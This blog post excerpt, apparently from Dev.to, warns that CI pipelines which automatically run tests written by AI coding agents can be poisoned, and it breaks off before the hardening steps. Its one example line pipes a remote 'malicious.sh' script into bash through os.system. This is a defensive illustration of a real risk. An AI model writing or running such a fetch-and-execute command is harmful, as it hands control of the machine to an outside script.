
Agentic CI: How I Test AI Workers Like Services (Securely)
We have crossed the threshold from AI chatbots that passively answer questions to AI agents that actively execute tasks. If you are building an agent that refactors code, generates pull requests, or modifies database configurations, deploying it based on a manual "vibe check" in your terminal is a recipe for an outage. However, after auditing my own initial CI pipelines for these agents, I found a massive vulnerability: CI Poisoning. If you ask an LLM to generate code and tests, and you automatically run those tests in your GitHub Actions runner to verify them, you are piping untrusted, AI-hallucinated strings directly into subprocess.run(). If an agent hallucinates import os; os.system("curl malicious.sh | bash"), your CI runner is compromised. When an LLM is given write access, it requires the rigorous, automated gating of a microservice, combined with the paranoia of an AppSec sandbox. Here is exactly how I build hardened "Agentic CI" harnesses. Why This Matters (The Missing Logs Re
Continue reading on Dev.to Python
Opens in a new tab



